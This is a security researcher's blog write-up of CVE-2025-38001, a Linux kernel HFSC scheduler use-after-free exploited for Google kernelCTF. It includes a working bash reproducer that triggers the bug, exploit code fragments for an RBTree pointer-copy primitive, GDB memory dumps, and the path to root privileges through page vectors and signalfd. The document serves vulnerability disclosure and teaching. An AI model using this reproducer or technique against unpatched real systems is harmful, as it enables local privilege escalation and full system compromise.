[CVE-2025-38001] Exploiting All Google kernelCTF Instances And Debian 12 With A 0-Day For $82k: A RBTree Family Drama (Part One: LTS & COS)
D3vil
D3vil
• 34 min read
CVE-2025-38001 is a Use-After-Free vulnerability in the Linux network packet scheduler, specifically in the HFSC queuing discipline.
When the HFSC qdisc is utilized with NETEM and NETEM packet duplication is enabled, using HFSC_RSC it is possible to cause a double class insertion in the HFSC eligible tree.
Under normal conditions, this would lead to an infinite loop in hfsc_dequeue() due to an RBTree cycle.
However, by adding TBF as root qdisc, it is possible to prevent packets from being dequeued, bypass the infinite loop, free the class, and trigger a Use-After-Free.
In this article - the first part of the RBTree Family Drama series - we will explore how FizzBuzz101 and I discovered the vulnerability and how I exploited it using a page-level data-only attack to compromise LTS 6.6.*, COS 105, COS 109 and Debian 12 (and no, Ubuntu is not safe1) with the same binary and a success rate close to 100%.
In the second part of the series, we will focus on Google’s experimental mitigations and the strategy used to bypass them in order to compromise the mitigation instance.
Here is the exploit in action on a fully updated Debian 12:
Has your attention span been compromised by your smartphone? Don’t worry, we care about people like you,
so we’ve created a “TikTok version” of the entire story behind the discovery and exploitation
of this 0-day. (Audio, please!)
Exploit write-ups for our 🚨latest 0-day🚨and the tragedy that swept the red black tree family dropping soon 👀
Here is a tiktok style video for those of you with no attention span thanks to slop and social media. Turn on the audio!!! pic.twitter.com/nsvC00zZy8
Trigger the vulnerability to insert an HFSC class twice into the eligible tree
Free the class (it remains accessible in the tree), then spray page vectors to overwrite the freed object
Exploit RBTree transformations to achieve a pointer copy primitive and copy a page pointer from one pgv structure to another
Free the page, reclaim it as a pipe page, cause a page-UAF
Reclaim the page with a filp slab containing signalfd files, then swap file->private_data with file->f_cred and set the current process’ creds to 0 via signalfd
Between April and May 2025, I collaborated with my teammate William Liu (FizzBuzz101) on his master’s thesis project, a fuzzing framework based on Syzkaller. For now, I can’t say much more - other than that it is a very interesting project. I will add a link to the document once it is published by his institution.
I also worked on a custom version of Syzkaller in the past, so I could provide Will with some insights based on my experience. Additionally, his fuzzer also targeted net/sched, and since I was already familiar with the subsystem, I could help identify the root causes of multiple crashes and manually reproduce them, as syz-repro never worked for us.
Will and I managed to triage, reproduce, and report multiple bugs, including a TOCTOU that allowed us to crash five qdiscs2, and a infinite loop in NETEM caused by its weird packet duplication logic.3 The fuzzer also triggered a similar bug in hfsc_dequeue(), and since NETEM was also involved in this case, we included the crash in the NETEM report.
However, our initial analysis did not convince us, so we decided to audit the code again.
HFSC is a classful queuing discipline. When the realtime service curve (aka HFSC_RSC) is used, once a new packet is classified, the class is added to an RBTree called eligible tree. The problem arises when the leaf qdisc is NETEM and the NETEM packet duplication feature is enabled, as this causes the class to be inserted twice in the tree. This creates an RBTree cycle, resulting in an infinite loop when hfsc_dequeue() is called.
Since the double class insertion and the infinite loop occur at two distinct times in two different functions - hfsc_enqueue() and hfsc_dequeue() - one question arises: what would happen if the interface were unable to dequeue packets?
If you have read my recent article Two Bytes Of Madness, you know that at some point in that exploit, I had to prevent a type-confused “skb” from being dequeued to avoid a kernel crash. I achieved this by dropping the rate of the root qdisc, TBF.
The same approach turned out to be useful in the HFSC case as well: I added TBF as the root qdisc, sent multiple packets in a burst to the network interface to temporarily disable dequeue, caused the double class insertion, freed the class, triggered a new RBTree insertion, and boom! Use-After-Free!
In a moment, we turned an harmless infinite loop into a Use-After-Free vulnerability! Shortly afterward, we confirmed the bug’s exploitability and decided to use it in kernelCTF. Our goal was to compromise all instances, for an expected cumulative bounty of approximately $82,000.4
24 hours later, I came up with a portable exploit that worked on LTS, COS and Debian 12, thanks to a page-level data-only attack. Now we only needed to win the race for the LTS slot.
After several days spent optimizing the submission process, with the help of our team Crusaders of Rust, we managed to compromise the LTS instance, steal the flag and submit it in just 3.6 seconds after the system went live - the fastest submission in Google kernelCTF history!
This was only possible thanks to our teammates Timothy Herchen (anematode) who found a way to break the kCTF POW using AVX512 and a lot of brain power, Bryce Casaje (strellic) and Larry Yuan (ehhthing) who optimized the Google Form submission part, and Max Cai, who assisted us in the submission process. You can read the full story here on the Timothy’s blog. I will only add, that after our submission, Google decided to disable the PoW:
In the following days we also submitted the flag for COS (using the same exploit as LTS) and, after losing a decent amount of brain cells, compromised the mitigation instance:
In this function, hfsc_classify() returns class 1:1 [1]. Since qlen is still zero, first is set to true[2].
Next, qdisc_enqueue() is called, which internally calls the leaf qdisc’s enqueue() handler. [3]
At this point, since first is true and cl->cl_nactive is zero, the (first && !cl->cl_nactive) check at [4] passes, and init_ed() inserts the class into the HFSC eligible tree [5]. However, this check is incomplete, as cl->cl_nactiveis only incremented by init_vf(), and init_ed() never updates it.
This becomes problematic when the leaf qdisc is NETEM and the NETEM packet duplication feature is enabled, because the class can be inserted twice into the tree due to the reentrant enqueue:
staticintnetem_enqueue(structsk_buff*skb,structQdisc*sch,structsk_buff**to_free){structnetem_sched_data*q=qdisc_priv(sch);structnetem_skb_cb*cb;structsk_buff*skb2=NULL;structsk_buff*segs=NULL;unsignedintprev_len=qdisc_pkt_len(skb);intcount=1;skb->prev=NULL;if(q->duplicate&&q->duplicate>=get_crandom(&q->dup_cor,&q->prng))++count;// ...
if(count>1)skb2=skb_clone(skb,GFP_ATOMIC);// [1]
// ...
if(skb2){structQdisc*rootq=qdisc_root_bh(sch);u32dupsave=q->duplicate;/* prevent duplicating a dup... */q->duplicate=0;rootq->enqueue(skb2,rootq,to_free);// hfsc_enqueue() is called again [2]
q->duplicate=dupsave;skb2=NULL;}// ...
}
In netem_enqueue(), when packet duplication is enabled, the skb is cloned, [1] and the root qdisc’s enqueue handler called again. [2] This leads to the following chain of events:
hfsc_enqueue()cl=hfsc_classify()// Class 1:1
first=!cl->qdisc->q.qlen// true
qdisc_enqueue()netem_enqueue()// Packet duplication is enabled
skb2=skb_clone(skb)// The duplicate is enqueued in the root qdisc (rootq->enqueue(skb2, ...))
hfsc_enqueue()cl=hfsc_classify()// Class 1:1
first=!cl->qdisc->q.qlen// true
qdisc_enqueue()netem_enqueue()// Already a duplicate
// `first` is true, `cl->cl_natcive` is 0, so the class is inserted into the eltree
init_ed(cl,len);// The class is inserted into the eltree
sch->q.qlen++// ...
// `first` is true, `cl->cl_natcive` is 0, so the class is inserted into the eltree
init_ed(cl,len);// BUG! Class inserted twice!
sch->q.qlen++
After the double class insertion, hfsc_dequeue() is automatically called:
hfsc_dequeue() relies on eltree_get_mindl() to find the class with the minimum deadline among the eligible classes. [1] This is where the infinite loop occurs:
Due to a cycle in the RBTree caused by the double class insertion, the class is now both its parent and its left child:
gef➤p*(structrb_node*)0xffff88810a6d0ca0// class->el_node
$2={__rb_parent_color=0xffff88810a6d0ca0,// parent ***
rb_right=0x0<fixed_percpu_data>,rb_left=0xffff88810a6d0ca0// left child ***
}
In eltree_get_mindl(), rb_first() traverses the tree by following the rb_left child pointers until NULL is encountered. But since rb_left is the address of the node itself, the while loop never ends:
In tbf_dequeue(), if the number of remaining tokens is less than zero, [1] the qdisc will reschedule itself for later, [2] and from this moment on the interface will be unable to dequeue packets. The number of tokens in TBF is user-controllable and can be minimized in tbf_change().
This is particulary useful in the double class insertion case, because if the network interface is unable to dequeue packets, the infinite loop can be avoided, the class can be freed (remaining accessible in the RBTree due to the double insertion), and a Use-After-Free can be triggered when a new class is inserted into the tree.
Here is a reproducer to trigger a UAF when the kernel is compiled with KASAN:
#!/bin/bash
# # TBF qdisc (1:0) --> HFSC qdisc (2:0) --> HFSC class (2:1) --> NETEM qdisc (3:0)# `-> HFSC class (2:2)## Prevent packets from being dequeuedtc qdisc add dev lo root handle 1: tbf rate 8bit burst 100b latency 1s
tc qdisc add dev lo parent 1:0 handle 2:0 hfsc
ping -I lo -f -c10 -s48 -W0.001 127.0.0.1
# Setup the vulnerable configurationtc class add dev lo parent 2:0 classid 2:1 hfsc rt m2 20Kbit
tc qdisc add dev lo parent 2:1 handle 3:0 netem duplicate 100%
tc class add dev lo parent 2:0 classid 2:2 hfsc rt m2 20Kbit
tc filter add dev lo parent 2:0 protocol ip prio 1 u32 match ip dst 127.0.0.1 flowid 2:1
tc filter add dev lo parent 2:0 protocol ip prio 2 u32 match ip dst 127.0.0.2 flowid 2:2
# Class 2:1 is inserted twice into the eligible treeping -I lo -f -c1 -s48 -W0.001 127.0.0.1
# Class 2:1 is freed (but still accessible in the tree)tc filter del dev lo parent 2:0 protocol ip prio 1tc class del dev lo classid 2:1
# Trigger a UAF by inserting class 2:2 into the treeping -I lo -f -c1 -s48 -W0.001 127.0.0.2
Exploiting LTS And COS
To determine the bug’s exploitability, we need to take a look at the hfsc_class structure. It is defined as follows:
This object is fixed in size (752 bytes) and is allocated in kmalloc-1k by hfsc_change_class().
Looking at the class, one of the first exploitation strategies that comes to mind consists of overwriting the structure with user-controlled data, faking the pointer to the leaf qdisc. This way, when cl->qdisc->enqueue() or dequeue() is called, it would be possible to hijack control flow.
This approach is straightforward but requires a ROP-chain. I wanted to use a data-only attack, so I opted for a more creative strategy. I managed to achieve a pointer copy primitive by exploiting RBTree transformations to copy a page pointer from a packet ring’s pgv (page vector) structure to another. This allowed me to cause a page-UAF and easily set the current process’ credentials to zero.
Before exploring how the pointer copy primitive works, let’s examine how page vectors are implemented and how they can be allocated in kernel space.
Packet Rings And Page Vectors
Packet rings and pgv objects are generally used in kernel exploitation for heap grooming, as they allow for the spraying of a large number of pages of multiple orders. This provides good control over the buddy allocator.
The technique was originally presented by Andrey Konovalov back in 2017, when he exploited CVE-2017-7308, a bug in the Linux packet sockets.
In this exploit, we will not use page vectors to spray a large number of pages or user-controlled data, instead we will corrupt the vectors themselves to cause a page-UAF.
A new pgv object, is allocated by alloc_pg_vec() when packet_set_ring() is called. The allocation size depends on the number of pages in the vector, and can range from a vector composed of a single page (kmalloc-8) to a vector with hundreds of pages (> kmalloc-8k):
staticstructpgv*alloc_pg_vec(structtpacket_req*req,intorder){unsignedintblock_nr=req->tp_block_nr;structpgv*pg_vec;inti;pg_vec=kcalloc(block_nr,sizeof(structpgv),GFP_KERNEL|__GFP_NOWARN);// From kmalloc-8 to kmalloc-8k and beyond
if(unlikely(!pg_vec))gotoout;for(i=0;i<block_nr;i++){pg_vec[i].buffer=alloc_one_pg_vec_page(order);if(unlikely(!pg_vec[i].buffer))gotoout_free_pgvec;}out:returnpg_vec;out_free_pgvec:free_pg_vec(pg_vec,order,block_nr);pg_vec=NULL;gotoout;}
When a packet socket is closed, packet_release() is called in kernel-space. If a page vector is already allocated for the TX ring or RX ring, packet_set_ring() is called, which in turn uses free_pg_vec() to first free the pages in the vector and then release the vector itself:
This function is the more secure version of remap_pfn_range(). Internally, it relies on insert_page() which uses validate_page_before_insert() to validate the page before mapping it to user-space:
From an attacker’s perspective, since the page vector allocation and page mapping to user-space occur at two different times, if the page vector is corrupted, it is possible to trick the kernel into mmapping the wrong page.
However, as previously mentioned, unlike remap_pfn_range(), vm_insert_page() performs additional checks, which makes this strategy not always applicable.
Another valid approach involves corrupting one of the page pointers in the vector (e.g. partial or total overwrite) so that the same page is contained in two different pgv objects at the same time.
This would cause a mismatch between the page refcount and the places where the page is actually utilized, enabling a page-UAF primitive when pages are freed by free_pg_vec().
This is what we are going to do in this exploit: copying a page pointer from one pgv to another to cause a page UAF.
An additional note about remap_pfn_range():
Back in the day, it was possible to use io_uring_mmap() to mmap io_uring rings to user-space. This function used remap_pfn_range() so an attacker only needed to overwrite one of the ring’s kernel-space pointers (e.g. ctx->sq_sqes) with a victim address and call io_uring_mmap() to mmap it to user-space!
RBTrees allow for a pointer copy primitive under tree transformations. The only requirement is full or even partial control over an RBNode, which can be obtained through type confusion. A rb_node structure is defined as follows:
In this structure, we have two children nodes, rb_right at offset 0x8, rb_left at offset 0x10, and a tagged pointer, __rb_parent_color, which stores two pieces of information:
Now, in the HFSC UAF case, our goal is to copy a page pointer from a pgv to another. Given the following network traffic control configuration (see the Vulnerability Analysis section):
TBF qdisc (1:0) --> HFSC qdisc (2:0) --> HFSC class (2:1) --> NETEM qdisc (3:0)
`-> HFSC class (2:2)
an RBTree pointer copy primitive can be achieved with the following steps:
We trigger the vulnerability so that class 2:1 is inserted twice in the HFSC eltree. Then we free the class and replace it with a page vector. This will cause a type confusion, replacing all the pointers in the &cl->el_node (an rb_node structure) with pointers to user-controlled pages.
After getting rid of the old RBNode family members, we cause an RBTree insertion by sending a single packet to class 2:2. This will insert class 2:2 into the eltree. Since the children of class 2:1 el_node are now both pointers to user-controlled pages, the el_node pointer of class 2:2 will be written into one of these pages, leaking the address to user-space.
Now, we forge and infiltrate a malicious grandparent node (class 2:2’s grandparent) in the tree, making it point 0x10 bytes before the target address. In this case, 0x10 bytes before a page vector, so that the rb_left child of the grandparent node corresponds to the first page in the pgv.
Finally, with a single tree update and a deletion, a pointer will be copied from the pgv used to overwrite class 2:1 to the target pgv.
While in the exploit the pointer copy primitive appears straightforward, requiring only a few lines of code:
send_packets("lo",64,1,TC_H(2,2));// Insert
// ... Find the 2:2 class elnode pointer in the pages ...
uint64_thfsc_class=hfsc_elnode-hfsc_class_elnode_offset;uint64_ttarget_pgv=hfsc_class+HFSC_CLASS_CHUNK_SIZE;// Next pgv in memory
for(inti=0;i<total_size;i+=PAGE_SIZE)// Infiltrate Evil Grandpa in the RBTree
*(uint64_t*)((char*)page_a+i)=target_pgv-0x10;// Next pgv in memory - 0x10
tc(ADD_CLASS,"hfsc","lo",TC_H(2,2),TC_H(2,0),NULL,1);// Update
tc(DEL_CLASS,"hfsc","lo",TC_H(2,2),0,NULL,0);// Delete
to fully understand how this is possible, we need to analyze what happens in kernel-space behind the scenes, and this, is quite a bit more complex.
RBTree Pointer Copy Primitive - Behind The Scenes
In the following analysis:
Node A (0xffff88810a6d0ca0) is the class 2:1 el_node address. This class will be overwritten by a page vector.
Node C (0xffff88810a6d18a0) is the class 2:2 el_node address. We will leak this address. (In the exploit, we allocate class 2:2 ensuring it is “surrounded” by page vectors in its slab).
Node P (0xffff88810ac21000) is the virtual address of one of the pages in the page vector. This page is also mapped to user-space, so we have full control over its content. This pointer will be copied into another page vector.
Node E (0xffff88810a6d1bf0) this is the malicious grandparent node (aka Evil Grandpa) that we are going to infiltrate in the RBTree. Its address corresponds to the address of class 2:2 + KMALLOC_1024_CHUNK_SIZE (1024) - 0x10, in other words, 0x10 bytes before the next object in memory, which is a pgv (remember that class 2:2 is “surrounded” by pgv objects in its slab).
In the exploit, we first trigger the vulnerability, so that class 2:1 is added twice to the eligible tree, creating an RBTree cycle:
send_packets("lo",64,1,TC_H(2,1));// Trigger the double class insertion
Now we free class 2:1. Although the object is freed, it remains accessible in the tree due to the duplicate. We proceed to spray page vectors and cause a type confusion between the freed hfsc_class and a pgv object.
For each page in the page vectors, we also ensure that the first qword is set to 1. Remember that the first qword of an rb_node correspond to the __rb_parent_color. This means we are actually faking a RB_BLACK color, so when the type confusion occurs, the pages are considered black nodes. Keep this step in mind, as it will be useful later.
Here is class 2:1 in memory after the type confusion:
gef➤x/40gx0xffff88810a6d0c00// This should be a hfsc_class (2:1), but... it is a pgv
0xffff88810a6d0c00:0xffff88810ac0b0000xffff88810ac0c0000xffff88810a6d0c10:0xffff88810ac0d0000xffff88810ac0e0000xffff88810a6d0c20:0xffff88810ac0f0000xffff88810ac100000xffff88810a6d0c30:0xffff88810ac110000xffff88810ac120000xffff88810a6d0c40:0xffff88810ac130000xffff88810ac140000xffff88810a6d0c50:0xffff88810ac150000xffff88810ac160000xffff88810a6d0c60:0xffff88810ac170000xffff88810ac180000xffff88810a6d0c70:0xffff88810ac190000xffff88810ac1a0000xffff88810a6d0c80:0xffff88810ac1b0000xffff88810ac1c0000xffff88810a6d0c90:0xffff88810ac1d0000xffff88810ac1e0000xffff88810a6d0ca0:0xffff88810ac1f000[1]0xffff88810ac20000[2]0xffff88810a6d0cb0:0xffff88810ac21000[3]0xffff88810ac220000xffff88810a6d0cc0:0xffff88810ac230000xffff88810ac240000xffff88810a6d0cd0:0xffff88810ac250000xffff88810ac26000
By overwriting the class with a page vector, we also replaced all the pointers in the el_node structure (an rb_node), located 0xa0 bytes within the hfsc_class, with pointers to user-controlled pages:
staticvoideltree_insert(structhfsc_class*cl){structrb_node**p=&cl->sched->eligible.rb_node;// Class 2:1 (now a pgv)
structrb_node*parent=NULL;structhfsc_class*cl1;while(*p!=NULL){parent=*p;// [1]
cl1=rb_entry(parent,structhfsc_class,el_node);// [2]
if(cl->cl_e>=cl1->cl_e)// [3]
p=&parent->rb_right;elsep=&parent->rb_left;}rb_link_node(&cl->el_node,parent,p);rb_insert_color(&cl->el_node,&cl->sched->eligible);}
In eltree_insert() the tree is traversed to determine where to insert the new class node.
For each node, the class real address is derived using rb_entry() (which essentially subtracts offsetof(struct hfsc_class, el_node) = 0xa0 bytes from the &cl->elnode address).
Then, the cl_e field of the class is compared with that of the class being inserted. If the latter is greater, the right path is taken, otherwise the left path is taken.
First iteration
In the first iteration, since class 2:1 is now a page vector, when its cl_e field (a u64) is compared with that of class 2:2, it corresponds to a page pointer (a very large u64 value!), therefore, the left path is taken.
Second iteration
In the second iteration, since page P (now considered an rb_node) is zeroed out (with the exception of its first qword, which is set to RB_BLACK), both of its children are are NULL, causing the loop to break.
At this point class 2:2 (C) is inserted into the tree by rb_link_node():
staticinlinevoidrb_link_node(structrb_node*node,structrb_node*parent,structrb_node**rb_link){node->__rb_parent_color=(unsignedlong)parent;// C->__rb_parent_color = P
node->rb_left=node->rb_right=NULL;// C->rb_left = C->rb_right = NULL
*rb_link=node;// P->rb_right = C
}
In this function:
Node C becomes node P’s rb_right child.
Node P becomes node C’s parent.
All this results in the following RBTree:
The address of node C (the el_node address of class 2:2) has been written into a user-controlled page, allowing us to leak the pointer.
If we look at the tree from node P’s prospective, it is an orphan node, and the color bit of __rb_parent_color (set to 1) indicates it is a black node:
static__always_inlinevoid__rb_insert(structrb_node*node,structrb_root*root,void(*augment_rotate)(structrb_node*old,structrb_node*new)){structrb_node*parent=rb_red_parent(node),*gparent,*tmp;// node = C (0xffff88810a6d18a0) // Class 2:2
// parent = P (0xffff88810ac21000)
while(true){if(unlikely(!parent)){rb_set_parent_color(node,NULL,RB_BLACK);break;}// P->__rb_parent_color is RB_BLACK (1)
// P is considered a black node
// The loop breaks here
if(rb_is_black(parent))// [1]
break;// ...
}// ...
}
Since node C’s parent, P, is considered a black node, the function returns immediately and the tree is not rebalanced. [1]
Now, in the exploit code, we can proceed to locate page P and leak the &cl->elnode address of class 2:2. From this we can derive the real address of the class by simply subtracting the el_node offset (0xa0 bytes).
Now we can forge the malicious grandparent address and have it infiltrate the RBTree (replacing the fake black node (1) with its address).
The address of Evil Grandpa corresponds to the address of class 2:2 + KMALLOC_1024_CHUNK_SIZE (1024) - 0x10, in other words, 0x10 bytes before a pgv structure.
uint64_thfsc_class=hfsc_elnode-hfsc_class_elnode_offset;uint64_ttarget_pgv=hfsc_class+HFSC_CLASS_CHUNK_SIZE;// Next pgv in memory
for(inti=0;i<total_size;i+=PAGE_SIZE)// Infiltrate Evil Grandpa in the RBTree
*(uint64_t*)((char*)page_a+i)=target_pgv-0x10;// Next pgv in memory - 0x10
By setting Evil Grandpa’s address to 0x10 bytes before a pgv, we ensure its rb_left child corresponds to the first page in the page vector.
After Evil Grandpa infiltrates the RBTree, this is the situation in memory from the prospective of node P:
Inspecting Evil Grandpa in GDB, we can confirm it points 0x10 bytes before a page vector:
gef➤x/40gx0xffff88810a6d1bf0// E
0xffff88810a6d1bf0:0x00000000000000000x00000000000000000xffff88810a6d1c00:0xffff888121326000***0xffff8881213250000xffff88810a6d1c10:0xffff8881213270000xffff8881213280000xffff88810a6d1c20:0xffff8881213290000xffff88812132a0000xffff88810a6d1c30:0xffff88812132b0000xffff88812132c0000xffff88810a6d1c40:0xffff88812132d0000xffff88812132e000
And that its rb_left child corresponds to the address of the first page in the vector:
gef➤p*(structrb_node*)0xffff88810a6d1bf0// E
$66={__rb_parent_color=0x0,rb_right=0x0<fixed_percpu_data>,rb_left=0xffff888121326000***// TARGET
}
In kernel-space, we have the following chain of calls: hfsc_change_class() -> update_el() -> eltree_update(). The eltree_update() function is defined as follows:
It is an rb_erase() wrapper that also ensures the current node is correctly cleaned after removal. rb_erase() is, in turn, a wrapper for __rb_erase_augmented():
static__always_inlinestructrb_node*__rb_erase_augmented(structrb_node*node,structrb_root*root,conststructrb_augment_callbacks*augment){structrb_node*child=node->rb_right;// child = C->rb_right = 0
structrb_node*tmp=node->rb_left;// tmp = C->rb_left = 0
structrb_node*parent,*rebalance;unsignedlongpc;if(!tmp){pc=node->__rb_parent_color;// pc = C->__rb_parent_color = P
parent=__rb_parent(pc);// parent = P
__rb_change_child(node,child,parent,root);// WRITE_ONCE(P->rb_right, 0) [1]
if(child){child->__rb_parent_color=pc;rebalance=NULL;}elserebalance=__rb_is_black(pc)?parent:NULL;tmp=parent;}// ...
}
In this function, since class 2:2 has no children, node C is simply removed from the tree by zeroing out the P’s rb_right child, [1] resulting in the following configuration:
RBTee Update - eltree_insert()
After eltree_remove(), eltree_update() calls eltree_insert() to re-insert class 2:2 into the tree. The first part, is identical to the initial insertion:
staticinlinevoidrb_link_node(structrb_node*node,structrb_node*parent,structrb_node**rb_link){node->__rb_parent_color=(unsignedlong)parent;// C->__rb_parent_color = P
node->rb_left=node->rb_right=NULL;// C->rb_left = C->rb_right = NULL
*rb_link=node;// P->rb_right = C
}
As expected, we are in the same situation as before the deletion:
But now something has changed. Node P’s parent (or C’s grandparent) is no longer 1 (RB_BLACK), we replaced it with the address of Evil Grandpa. The last bit of this address is 0 (RB_RED), so node P is considered a red node.
For this reason, when __rb_insert() is called, the situation becomes a bit more complicated, as the tree needs to rebalance itself:
// parent = node = C (0xffff88810a6d18a0)
// tmp = C->rb_right = 0
// Case 3 - node's uncle is black and node is
// the parent's left child (right rotate at gparent).
WRITE_ONCE(gparent->rb_left,tmp);// E->rb_left = 0 [1]
WRITE_ONCE(parent->rb_right,gparent);// C->rb_right = E [2]
if(tmp)// not taken
rb_set_parent_color(tmp,gparent,RB_BLACK);__rb_rotate_set_parents(gparent,parent,root,RB_RED);// [3] ***
augment_rotate(gparent,parent);// dummy_rotate, nop
break;}else{// ...
}}}// ...
staticinlinevoid__rb_rotate_set_parents(structrb_node*old,structrb_node*new,structrb_root*root,intcolor)// ***
{// old = E, new = C
structrb_node*parent=rb_parent(old);// parent = E->__rb_parent_color = 0
new->__rb_parent_color=old->__rb_parent_color;// C->__rb_parent_color = E->__rb_parent_color = 0
rb_set_parent_color(old,new,color);// E->__rb_parent_color = C (RB_RED)
__rb_change_child(old,new,parent,root);// WRITE_ONCE(root->rb_node, C);
}
In the second part of the function:
Node C’s rb_right child, which is 0 (now assigned to the tmp variable) becomes Evil Grandpa’s rb_left child. [1] (basically, the first page pointer in the target page vector is set to NULL).
Node E becomes node C’s rb_right child. [2].
Finally in __rb_rotate_set_parents(): [3]
Node C’s parent is replaced with the parent of node E, which is 0.
Node C becomes node E’s parent.
Node C is then promoted to root node.
All this results in this tree configuration:
This is confirmed by analyzing node C (class 2:2) in GDB:
gef➤p*(structrb_node*)0xffff88810a6d18a0// C
$67={__rb_parent_color=0x0,rb_right=0xffff88810a6d1bf0,// E
rb_left=0xffff88810ac21000// P
}
We can also observe that Evil Grandpa’s parent is now node C, and its rb_left child has been zeroed out:
gef➤p*(structrb_node*)0xffff88810a6d1bf0// E
$68={__rb_parent_color=0xffff88810a6d18a0,// C
rb_right=0x0<fixed_percpu_data>,rb_left=0x0<fixed_percpu_data>// TARGET = 0
}
Evil Grandpa’s rb_left child corresponds to the first page in the target page vector, and, as expected, it has been wiped out:
gef➤x/10gx0xffff88810a6d1bf0// E, 0x10 bytes before the next page vector in the slab
0xffff88810a6d1bf0:0xffff88810a6d18a00x00000000000000000xffff88810a6d1c00:0x0000000000000000***0xffff8881213250000xffff88810a6d1c10:0xffff8881213270000xffff8881213280000xffff88810a6d1c20:0xffff8881213290000xffff88812132a0000xffff88810a6d1c30:0xffff88812132b0000xffff88812132c000
We have finally reached the last part. Now we only need to trigger the removal of class 2:2 from the tree. This will replace Evil Grandpa’s rb_left child (the first page in a pgv) with the address of page P.
The following chain of calls is triggered: hfsc_delete_class() -> qdisc_purge_queue() -> qdisc_tree_reduce_backlog() -> hfsc_qlen_notify() -> eltree_remove() -> rb_erase() -> __rb_erase_augmented().
__rb_erase_augmented() proceeds to remove class 2:2 from the tree and then rebalances it:
Node C is no longer the root node, as this now is set to 0. [2]
Node E’s parent is cleared. [3]
By inspecting Evil Grandpa in GDB, we can confirm that its rb_left child now corresponds to page P.
gef➤p*(structrb_node*)0xffff88810a6d1bf0// E
$102={__rb_parent_color=0x0,rb_right=0x0<fixed_percpu_data>,rb_left=0xffff88810ac21000// TARGET = P
}
This means that Page P has been copied from the original page vector (the one used to overwrite class 2:1) to the target pgv:
gef➤x/40gx0xffff88810a6d0ca0// Original (Class 2:1)
0xffff88810a6d0ca0:0xffff88810ac1f0000xffff88810ac200000xffff88810a6d0cb0:0xffff88810ac21000***0xffff88810ac220000xffff88810a6d0cc0:0xffff88810ac230000xffff88810ac240000xffff88810a6d0cd0:0xffff88810ac250000xffff88810ac26000gef➤x/40gx0xffff88810a6d1bf0// E
0xffff88810a6d1bf0:0x00000000000000000x00000000000000000xffff88810a6d1c00:0xffff88810ac21000***0xffff8881213250000xffff88810a6d1c10:0xffff8881213270000xffff8881213280000xffff88810a6d1c20:0xffff8881213290000xffff88812132a000
From Page-UAF To Root
Now the same page is referenced in two different page vectors, creating a mismatch between the page refcount and the actual number of places where it is utilized. We can exploit this discrepancy to cause a page-UAF in just a few steps:
At this point we only need to reclaim the freed page with a filp cache containing signalfd files, swap file->f_cred with file->private_data and use multiple writes via signalfd to set the current task’s credentials to zero. This last part is essentially a copy and paste of what I did in my Two Bytes Of Madness exploit.
That’s it! The system is compromised!
Conclusion
If you have reached this section, congratulations! Your smartphone hasn’t compromised your ability to focus!
I hope you found this first part of the RBTree Family Drama series interesting. I learned a lot from this, but two very important points I would like to highlight are:
Fuzzing is great, but code auditing remains a fundamental part of vulnerability research.
It doesn’t matter if you are looking for vulnerabilities or writing an exploit, always verify your assumptions, or you could end up missing something.
A big thanks goes to my teammate William Liu, one of the best pwners I know. It’s rare to find such a talented person who also knows how to work in team. Working with you is always a pleasure. Also, my best congratulations on your excellent master’s thesis!
Thanks to all my team, especially Timothy. Without you, we would never have won the race for the LTS slot. Also, I thought I was smart before reading your article.
A big thanks also goes to all the kernelCTF admins who assisted us, especially to KT!
Didn’t have enough of RBTrees? You love to hurt yourself analyzing weird RBTree states? Perfect! Don’t miss the second part of the series, where we will pwn the mitigation instance.
Expect more diagrams and more brain cells lost forever!
As always, if you have any questions, corrections, clarifications, or anything else, feel free to contact me at savy<@>syst3mfailure.io.